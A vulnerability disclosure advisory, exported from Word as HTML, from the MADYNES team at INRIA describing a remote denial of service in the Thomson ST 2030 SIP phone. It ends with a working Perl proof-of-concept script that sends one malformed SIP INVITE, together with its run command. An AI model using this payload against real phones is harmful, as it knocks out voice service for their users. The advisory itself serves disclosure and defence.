
<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:w="urn:schemas-microsoft-com:office:word" xmlns:st1="urn:schemas-microsoft-com:office:smarttags" xmlns="http://www.w3.org/TR/REC-html40">


<head>

<meta http-equiv=Content-Type content="text/html; charset=us-ascii">

<meta name=Generator content="Microsoft Word 11 (filtered medium)">

<o:SmartTagType namespaceuri="urn:schemas-microsoft-com:office:smarttags"

 name="PlaceType"/>

<o:SmartTagType namespaceuri="urn:schemas-microsoft-com:office:smarttags"

 name="PlaceName"/>

<o:SmartTagType namespaceuri="urn:schemas-microsoft-com:office:smarttags"

 name="place"/>

<!--[if !mso]>

<style>

st1\:*{behavior:url(#default#ieooui) }

</style>

<![endif]-->

<style>

<!--

 /* Style Definitions */

 p.MsoNormal, li.MsoNormal, div.MsoNormal

        {margin:0in;

        margin-bottom:.0001pt;

        font-size:12.0pt;

        font-family:"Times New Roman";}

a:link, span.MsoHyperlink

        {color:blue;

        text-decoration:underline;}

a:visited, span.MsoHyperlinkFollowed

        {color:purple;

        text-decoration:underline;}

span.EmailStyle17

        {mso-style-type:personal-compose;

        font-family:Arial;

        color:windowtext;}

@page Section1

        {size:595.3pt 841.9pt;

        margin:70.85pt 70.85pt 70.85pt 70.85pt;}

div.Section1

        {page:Section1;}

-->

</style>


</head>


<body lang=FR link=blue vlink=purple>


<div class=Section1>


<p class=MsoNormal><font size=2 face=Arial><span style='font-size:10.0pt;

font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'>MADYNES Security Advisory : &nbsp;Remote DOS on Thomson

SIP phone &nbsp;ST 2030<o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'>Date of Discovery 15 &nbsp;February, 2007<o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'>Vendor was notified on 1 March 2007<o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'>ID: KIPH8<o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'>Synopsis<o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'>After sending a message where the a space is replaced

by a slash after the SIP version in the VIA,&nbsp; the device looks functional

but in fact does not respond to any event provoking a DoS. <o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'>Background <o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'>SIP is the IETF standardized (RFCs 2543 and 3261)

protocol for VoIP signalization. SIP is an ASCII based INVITE message is used

to initiate and maintain a communication session. <o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'>Affected devices: &nbsp;Thomson SIP phone ST 2030<o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'>Impact :<o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'>A malicious user can remotely crash and perform a

denial of service attack by sending one crafted SIP&nbsp; message. <o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'>Resolution<o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'>Fixed software will be available from the vendor and

customers following recommended best practices (ie segregating VOIP traffic from

data) will be protected from malicious traffic in most situations. <o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'>Credits<o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'>Humberto J. Abdelnur (Ph.D Student) <o:p></o:p></span></font></p>


<p class=MsoNormal><st1:place w:st="on"><st1:PlaceName w:st="on"><font size=2

  face=Arial><span lang=EN-US style='font-size:10.0pt;font-family:Arial'>Radu</span></font></st1:PlaceName><font

 size=2 face=Arial><span lang=EN-US style='font-size:10.0pt;font-family:Arial'>

 <st1:PlaceType w:st="on">State</st1:PlaceType></span></font></st1:place><font

size=2 face=Arial><span lang=EN-US style='font-size:10.0pt;font-family:Arial'>

(Ph.D) <o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'>Olivier Festor (Ph.D) <o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'>This vulnerability was identified by the Madynes

research team at INRIA Lorraine, using the Madynes VoIP fuzzer KIPH (for a

description see http://hal.inria.fr/inria-00166947/en),<o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'>&nbsp;<o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'>Configuration of our device:<o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'>Software Version:&nbsp;&nbsp; v1.52.1 <o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'>IP-Address obtained by DHCP as 192.168.1.106 <o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span style='font-size:10.0pt;

font-family:Arial'>User name : thomson<o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'>To run the exploit the file thomson-2030-3.pl should

be launched (assuming our configurations) as:<o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'>&nbsp;perl thomson-2030-3.pl 192.168.1.106 5060

thomson<o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'>POC Code&nbsp;:<o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'>!/usr/bin/perl<o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'>#Vulnerability for Thomson 2030 firmware v1.52.1<o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'>#It provokes a DoS in the device. <o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'>use IO::Socket::INET;<o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'>die &quot;Usage $0 &lt;dst&gt; &lt;port&gt;

&lt;username&gt;&quot; unless ($ARGV[2]);<o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'>$socket=new

IO::Socket::INET-&gt;new(PeerPort=&gt;$ARGV[1],<o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=EN-US style='font-size:

10.0pt;font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></font><font

size=2 face=Arial><span lang=PT-BR style='font-size:10.0pt;font-family:Arial'>Proto=&gt;'udp',<o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=PT-BR style='font-size:

10.0pt;font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;

PeerAddr=&gt;$ARGV[0]);<o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=PT-BR style='font-size:

10.0pt;font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span lang=PT-BR style='font-size:

10.0pt;font-family:Arial'>$msg = &quot;INVITE sip:$ARGV[2]\@$ARGV[0]

SIP/2.0\r\nVia: SIP/2.0/UDP\\192.168.1.2;branch=00\r\nFrom: Caripe

&lt;sip:caripe\@192.168.1.2&gt;;tag=00\r\nTo:

&lt;sip:$ARGV[2]\@$ARGV[0]&gt;;tag=00\r\nCall-ID: caripe\@192.168.1.2\r\nCSeq:

2 INVITE\r\n\r\n&quot;;<o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span style='font-size:10.0pt;

font-family:Arial'>$socket-&gt;send($msg);<o:p></o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span style='font-size:10.0pt;

font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span style='font-size:10.0pt;

font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


<p class=MsoNormal><font size=2 face=Arial><span style='font-size:10.0pt;

font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>


</div>


</body>


</html>